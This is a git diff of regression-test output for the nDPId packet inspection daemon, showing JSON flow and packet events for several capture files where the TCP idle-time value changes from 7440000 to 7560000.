+00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854557802,"flow_last_seen":1031854568982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4508,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854565447,"flow_last_seen":1031854565700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","packets-captured":131,"packets-processed":117,"total-skipped-flows":0,"total-l4-data-len":22225,"total-not-detected-flows":3,"total-guessed-flows":27,"total-detected-flows":8,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":206,"global_ts_msec":1031854568982} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 131/117 diff --git a/test/results/git.pcap.out b/test/results/git.pcap.out index a45a6d23a..b3a825917 100644 --- a/test/results/git.pcap.out +++ b/test/results/git.pcap.out 
@@ -1,11 +1,11 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"git.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1460821630164} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460821630164,"flow_last_seen":1460821630164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1460821630164,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460821630164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630164,"pkt":"nJcm0ghCPJcOZtCOCABFAAA8Q1ZAAEAGScLAqABNBZnnFbt3JMp+hgtEAAAAAKACchB0gwAAAgQFtAQCCAoBp0gSAAAAAAEDAwo="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460821630221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630221,"pkt":"PJcOZtCOnJcm0ghCCABFCAA8AABAAC8GnhAFmecVwKgATSTKu3dqwE5VfoYLRaASOJBfrwAAAgQFrAQCCAorjWmrAadIEgEDAwc="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460821630222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1460821630222,"pkt":"nJcm0ghCPJcOZtCOCABFAAA0Q1dAAEAGScnAqABNBZnnFbt3JMp+hgtFasBOVoAQAB3G2AAAAQEICgGnSCArjWmr"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460821630164,"flow_last_seen":1460821630164,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1460821630164,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460821630164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630164,"pkt":"nJcm0ghCPJcOZtCOCABFAAA8Q1ZAAEAGScLAqABNBZnnFbt3JMp+hgtEAAAAAKACchB0gwAAAgQFtAQCCAoBp0gSAAAAAAEDAwo="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460821630221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630221,"pkt":"PJcOZtCOnJcm0ghCCABFCAA8AABAAC8GnhAFmecVwKgATSTKu3dqwE5VfoYLRaASOJBfrwAAAgQFrAQCCAorjWmrAadIEgEDAwc="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460821630222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1460821630222,"pkt":"nJcm0ghCPJcOZtCOCABFAAA0Q1dAAEAGScnAqABNBZnnFbt3JMp+hgtFasBOVoAQAB3G2AAAAQEICgGnSCArjWmr"} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} 
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","packets-captured":90,"packets-processed":90,"total-skipped-flows":0,"total-l4-data-len":68049,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1460821631269} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 90/90 diff --git a/test/results/gnutella.pcap.out b/test/results/gnutella.pcap.out index 90761e858..34889ed1f 100644 --- a/test/results/gnutella.pcap.out +++ b/test/results/gnutella.pcap.out 
@@ -114,190 +114,190 @@ 00423{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":61191,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":44,"pkt_l4_len":10,"thread_ts_msec":61191,"pkt":"UlQAEjUCCAAn5uVZCABFAAAegT8AAIARoX8KAAIPCgACAuETFOcACvHOAAA="} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61470,"flow_last_seen":61470,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":61470,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57620,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00423{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":61470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":44,"pkt_l4_len":10,"thread_ts_msec":61470,"pkt":"UlQAEjUCCAAn5uVZCABFAAAegUAAAIARoX4KAAIPCgACAuEUFOcACvHNAAA="} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61974,"flow_last_seen":61974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":61974,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":50190,"dst_port":29545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":61974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":61974,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XhVAAIAGAIEKAAIPUIw\/k8QOc2l5awyyAAAAAIAC+vAaXAAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61974,"flow_last_seen":61974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":61974,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":50191,"dst_port":6778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":61974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":61974,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0N+lAAIAGQ8EKAAIPzyaj5MQPGnrqoUd3AAAAAIAC+vDkYgAAAgQFtAEDAwgBAQQC"} 
-00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61975,"flow_last_seen":61975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":61975,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":50192,"dst_port":16201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":61975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":61975,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0uv9AAIAGr1wKAAIPLUFXGMQQP0mE8cSsAAAAAIAC+vCWvwAAAgQFtAEDAwgBAQQC"} -00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61975,"flow_last_seen":61975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":61975,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":50193,"dst_port":46010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
